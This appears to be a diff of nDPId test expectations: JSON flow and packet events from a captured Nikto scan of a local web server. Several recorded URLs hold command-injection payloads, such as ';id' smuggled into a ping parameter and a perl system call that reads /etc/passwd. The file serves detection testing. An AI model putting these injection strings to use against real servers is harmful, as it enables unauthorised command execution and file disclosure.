 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":1,"flow_last_seen":1576420277550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420277550,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/wwtAAEAGeSt\/AAABfwAAAcXaH5CLi\/vjqeJa6IAYAED+swAAAQEICp1m\/ladZv5WR0VUIC9tYW51YWwucGhwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/manual.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001158)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/manual.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001158)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":1,"flow_last_seen":1576420277552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"ts_msec":1576420277552,"pkt":"AAAAAAAAAAAAAAAACABFAADZ8pVAAEAGSYd\/AAABfwAAAcXcH5AUWcqAeMmTFYAYAED+zQAAAQEICp1m\/lidZv5YR0VUIC9tb2RzL2FwYWdlL2FwYWdlLmNnaT9mPWZpbGUuaHRtLnxpZHwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNTkpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mods\/apage\/apage.cgi?f=file.htm.|id|","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001159)"}}
+01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mods\/apage\/apage.cgi?f=file.htm.|id|","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001159)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7440000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00735{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":1,"flow_last_seen":1576420277553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"ts_msec":1576420277553,"pkt":"AAAAAAAAAAAAAAAACABFAAD6YiVAAEAG2dZ\/AAABfwAAAcXeH5DIEFrQ9+zWrIAYAED+7gAAAQEICp1m\/lmdZv5ZR0VUIC9tb2R1bGVzLnBocD9uYW1lPU5ldHdvcmtfVG9vbHMmZmlsZT1pbmRleCZmdW5jPXBpbmdfaG9zdCZoaW5wdXQ9JTNCaWQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7440000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001160)"}}
+01108{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7440000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001160)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7440000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00744{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":1,"flow_last_seen":1576420277554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":269,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":269,"pkt_l4_len":235,"ts_msec":1576420277554,"pkt":"AAAAAAAAAAAAAAAACABFAAD\/xMZAAEAGdzB\/AAABfwAAAcXgH5A8ZfwprHRx4oAYAED+8wAAAQEICp1m\/lqdZv5aR0VUIC9udWtlL21vZHVsZXMucGhwP25hbWU9TmV0d29ya19Ub29scyZmaWxlPWluZGV4JmZ1bmM9cGluZ19ob3N0JmhpbnB1dD0lM0JpZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTYxKQ0KDQo="}
-00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7440000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001161)"}}
+01114{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7440000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001161)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":1,"flow_last_seen":1576420277556,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":240,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":240,"pkt_l4_len":206,"ts_msec":1576420277556,"pkt":"AAAAAAAAAAAAAAAACABFAADi3pNAAEAGXYB\/AAABfwAAAcXiH5AliOZ9pOzTK4AYAED+1gAAAQEICp1m\/lydZv5cR0VUIC9wZXJsLy1lJTIwJTIyc3lzdGVtKCdjYXQlMjAvZXRjL3Bhc3N3ZCcpO1wlMjIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjIpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20%22system('cat%20\/etc\/passwd');\\%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001162)"}}
+01088{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20%22system('cat%20\/etc\/passwd');\\%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001162)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7440000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00744{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":1,"flow_last_seen":1576420277558,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":270,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":270,"pkt_l4_len":236,"ts_msec":1576420277558,"pkt":"AAAAAAAAAAAAAAAACABFAAEAA3dAAEAGOH9\/AAABfwAAAcXkH5CI\/DuZGQJJI4AYAED+9AAAAQEICp1m\/l6dZv5eR0VUIC9waHBudWtlL2h0bWwvLnBocD9uYW1lPU5ldHdvcmtfVG9vbHMmZmlsZT1pbmRleCZmdW5jPXBpbmdfaG9zdCZoaW5wdXQ9JTNCaWQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7440000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/html\/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001163)"}}
+01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7440000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/html\/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001163)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7440000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":1,"flow_last_seen":1576420277560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"ts_msec":1576420277560,"pkt":"AAAAAAAAAAAAAAAACABFAAECBD1AAEAGN7d\/AAABfwAAAcXmH5DeDzzWjlOxJoAYAED+9gAAAQEICp1m\/mCdZv5gR0VUIC9waHBudWtlL21vZHVsZXMucGhwP25hbWU9TmV0d29ya19Ub29scyZmaWxlPWluZGV4JmZ1bmM9cGluZ19ob3N0JmhpbnB1dD0lM0JpZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7440000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001164)"}}
+01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7440000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001164)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":1,"flow_last_seen":1576420277561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277561,"pkt":"AAAAAAAAAAAAAAAACABFAADFzD1AAEAGb\/N\/AAABfwAAAcXoH5BUiPTWm6mSyIAYAED+uQAAAQEICp1m\/mGdZv5hR0VUIC9Qcm9ncmFtJTIwRmlsZXMvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/Program%20Files\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001165)"}}
